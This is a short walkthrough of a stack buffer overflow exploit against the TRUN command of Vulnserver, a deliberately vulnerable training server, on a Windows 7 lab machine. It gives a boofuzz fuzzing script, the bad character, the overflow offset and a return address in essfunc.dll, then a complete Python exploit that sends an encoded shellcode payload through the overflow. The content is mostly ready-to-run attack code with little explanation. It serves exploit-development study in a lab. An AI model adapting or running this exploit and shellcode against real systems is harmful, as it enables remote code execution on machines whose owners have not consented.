Vulnserver TRUN exploit Walkthrough

(Updated: )
reference stephenbradshaw/vulnserver
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC
target ip 192.168.1.6

fuzz

fuzz_trun.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python3
from boofuzz import *

host = "192.168.1.6"
port = 9999

session = Session(
        target=Target(
            connection=SocketConnection(host, port)
    ), sleep_time=1)

s_initialize("trun")
s_string("TRUN", fuzzable=False)
s_delim(" ", fuzzable=False)
s_string("data")

session.connect(s_get("trun"))

session.fuzz()

badchar

omitted
\x00

offset

omitted
2003

return address

omitted
essfunc.dll 0x625011af

exploit.py

exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!/usr/bin/env python3

import socket
import os
import sys

host = "192.168.1.6"
port = 9999

shellcode =  b""
shellcode += b"\xba\x9f\xf8\x62\x7b\xdb\xc5\xd9\x74\x24\xf4"
shellcode += b"\x5f\x2b\xc9\xb1\x52\x31\x57\x12\x03\x57\x12"
shellcode += b"\x83\x58\xfc\x80\x8e\x9a\x15\xc6\x71\x62\xe6"
shellcode += b"\xa7\xf8\x87\xd7\xe7\x9f\xcc\x48\xd8\xd4\x80"
shellcode += b"\x64\x93\xb9\x30\xfe\xd1\x15\x37\xb7\x5c\x40"
shellcode += b"\x76\x48\xcc\xb0\x19\xca\x0f\xe5\xf9\xf3\xdf"
shellcode += b"\xf8\xf8\x34\x3d\xf0\xa8\xed\x49\xa7\x5c\x99"
shellcode += b"\x04\x74\xd7\xd1\x89\xfc\x04\xa1\xa8\x2d\x9b"
shellcode += b"\xb9\xf2\xed\x1a\x6d\x8f\xa7\x04\x72\xaa\x7e"
shellcode += b"\xbf\x40\x40\x81\x69\x99\xa9\x2e\x54\x15\x58"
shellcode += b"\x2e\x91\x92\x83\x45\xeb\xe0\x3e\x5e\x28\x9a"
shellcode += b"\xe4\xeb\xaa\x3c\x6e\x4b\x16\xbc\xa3\x0a\xdd"
shellcode += b"\xb2\x08\x58\xb9\xd6\x8f\x8d\xb2\xe3\x04\x30"
shellcode += b"\x14\x62\x5e\x17\xb0\x2e\x04\x36\xe1\x8a\xeb"
shellcode += b"\x47\xf1\x74\x53\xe2\x7a\x98\x80\x9f\x21\xf5"
shellcode += b"\x65\x92\xd9\x05\xe2\xa5\xaa\x37\xad\x1d\x24"
shellcode += b"\x74\x26\xb8\xb3\x7b\x1d\x7c\x2b\x82\x9e\x7d"
shellcode += b"\x62\x41\xca\x2d\x1c\x60\x73\xa6\xdc\x8d\xa6"
shellcode += b"\x69\x8c\x21\x19\xca\x7c\x82\xc9\xa2\x96\x0d"
shellcode += b"\x35\xd2\x99\xc7\x5e\x79\x60\x80\xa0\xd6\x6b"
shellcode += b"\x09\x49\x25\x6b\xa8\x32\xa0\x8d\xc0\x54\xe5"
shellcode += b"\x06\x7d\xcc\xac\xdc\x1c\x11\x7b\x99\x1f\x99"
shellcode += b"\x88\x5e\xd1\x6a\xe4\x4c\x86\x9a\xb3\x2e\x01"
shellcode += b"\xa4\x69\x46\xcd\x37\xf6\x96\x98\x2b\xa1\xc1"
shellcode += b"\xcd\x9a\xb8\x87\xe3\x85\x12\xb5\xf9\x50\x5c"
shellcode += b"\x7d\x26\xa1\x63\x7c\xab\x9d\x47\x6e\x75\x1d"
shellcode += b"\xcc\xda\x29\x48\x9a\xb4\x8f\x22\x6c\x6e\x46"
shellcode += b"\x98\x26\xe6\x1f\xd2\xf8\x70\x20\x3f\x8f\x9c"
shellcode += b"\x91\x96\xd6\xa3\x1e\x7f\xdf\xdc\x42\x1f\x20"
shellcode += b"\x37\xc7\x2f\x6b\x15\x6e\xb8\x32\xcc\x32\xa5"
shellcode += b"\xc4\x3b\x70\xd0\x46\xc9\x09\x27\x56\xb8\x0c"
shellcode += b"\x63\xd0\x51\x7d\xfc\xb5\x55\xd2\xfd\x9f"

payload = b"TRUN /.:/"
payload += b"A"*2003
payload += b"\xaf\x11\x50\x62"
payload += b"\x90" * 16

payload += shellcode
payload += b"C" * (5000 - len(payload))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.recv(1024)
s.send(payload)
s.close()